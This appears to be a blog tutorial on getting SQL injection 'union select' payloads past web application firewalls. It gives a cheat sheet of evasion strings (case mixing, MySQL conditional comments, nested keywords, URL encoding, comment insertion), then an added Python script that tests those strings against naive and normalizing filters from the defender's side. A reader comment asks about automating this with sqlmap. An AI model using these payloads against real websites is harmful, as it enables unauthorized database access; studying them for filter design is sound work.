WAF bypass means getting a payload past a Web Application Firewall (WAF) that would otherwise answer with 403 Forbidden.
As the screenshot above shows, the plain payload "union+select 1,2,3,4,5,6,7,8--" was not executed; the firewall blocked it.
Getting past that block takes a few extra SQL injection tricks. That is what is meant by WAF bypass.
Here is one example of a WAF bypass:
"union(select 1,2,3,4,5,6,7,8)--"
As the next screenshot shows, this form of the SQL statement executed successfully.
Some Cheat Sheet for WAF Bypass on "UNION SELECT"
"UnioN SelecT" -->[Mixed upper- and lower-case letters, against case-sensitive filters]
"/*!Union*/ /*SelecT*/" -->[MySQL's /*! ... */ conditional-comment syntax: the server executes the text inside it, while a filter may skip it as a comment]
"UNIunionON+SELselectECT" -->[For firewalls that remove UNION SELECT from the URL instead of blocking the request: once the inner copies are stripped, the remaining letters read UNION SELECT again]
"%55nion %53elect" -->[URL encoding: %55 = U and %53 = S]
"%23ajithkp560%0aUnIOn%23ajithkp560%0aSeLecT" -->[%23 = #, a single-line comment, and %0a = newline, so each comment ends just before the keyword]
"/*&id=*/union/*&id=*/select/*&id=*/" -->[Unwanted comments inserted between the keywords]
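The cheat sheet above is a list of the ways a literal "union select" rule fails. The following script is an added example (not code from the original post or its author) that runs every listed payload through three filters from the defender's side: a naive case-sensitive match of the kind the screenshots show being evaded, a "delete the keyword" filter that shows why the nested UNIunionON form works, and a normalizing detector that percent-decodes, removes comment delimiters, and case-folds before looking for the keywords. The function and variable names are my own; the payload strings are copied from this page.

```python
import re
from urllib.parse import unquote_plus

# Payloads copied from the cheat sheet on this page, plus the plain form that
# the post says the firewall blocked (index 0).
CHEAT_SHEET = [
    "union+select 1,2,3,4,5,6,7,8--",
    "union(select 1,2,3,4,5,6,7,8)--",
    "UnioN SelecT",
    "/*!Union*/ /*SelecT*/",
    "UNIunionON+SELselectECT",
    "%55nion %53elect",
    "%23ajithkp560%0aUnIOn%23ajithkp560%0aSeLecT",
    "/*&id=*/union/*&id=*/select/*&id=*/",
]

KEYWORDS = ("union", "select")


def naive_block(raw: str) -> bool:
    """Case-sensitive literal match on the raw URL parameter.

    This models the rule that the post's screenshots show being evaded: only
    the plain 'union+select' / 'union select' form is caught.
    """
    return "union+select" in raw or "union select" in raw


def deleting_filter(raw: str) -> str:
    """A filter that strips each keyword once instead of rejecting the request.

    Included only to show why 'UNIunionON+SELselectECT' survives such a filter:
    the inner copies are removed and the outer letters reassemble.
    """
    return re.sub(r"union|select", "", raw, flags=re.IGNORECASE)


def normalize(raw: str) -> str:
    """Reduce a URL parameter to a canonical form before keyword matching."""
    s = raw
    # Percent-decode until the value stops changing (handles %55nion and
    # double encoding); unquote_plus also turns '+' into a space.
    for _ in range(3):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    # Drop MySQL line comments ('#...' and '--...') up to the end of the line.
    s = re.sub(r"#[^\n]*", " ", s)
    s = re.sub(r"--[^\n]*", " ", s)
    # Remove block-comment delimiters but keep their bodies: /*! ... */ is
    # executed by MySQL, and keeping plain comment bodies is the conservative
    # choice for detection.
    s = re.sub(r"/\*!?|\*/", " ", s)
    # Collapse all whitespace (including the %0a newline) and case-fold.
    return re.sub(r"\s+", " ", s).strip().lower()


def normalized_detect(raw: str) -> bool:
    """Flag the request if both keywords appear anywhere after normalization.

    Substring matching (not a 'union<space>select' sequence) is deliberate so
    that the nested 'UNIunionON SELselectECT' form is still flagged.
    """
    n = normalize(raw)
    return all(k in n for k in KEYWORDS)


def evaluate(payloads=CHEAT_SHEET):
    """Return {payload: (caught_by_naive, caught_by_normalized)}."""
    return {p: (naive_block(p), normalized_detect(p)) for p in payloads}


if __name__ == "__main__":
    for payload, (naive, hardened) in evaluate().items():
        print(f"{payload!r:50} naive={naive!s:5} normalized={hardened}")
    print("deleting filter:", deleting_filter("UNIunionON+SELselectECT"))
```

Running it shows the naive rule catching only the first payload while the normalizing detector flags all eight; the deleting filter turns the nested payload into `UNION+SELECT`, which is exactly why a WAF should reject a matching request rather than edit it. Because the detector matches substrings, benign text such as "reunion" and "selective" together would also be flagged, so this is a detection signal to tune, not a replacement for parameterised queries on the application side.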
2 comments
I can't do that manually like this. Which tamper data can do it using sqlmap, mr?
Please help me, thanks.
Check here: http://www.terminalcoders.co.vu/search/label/Hacking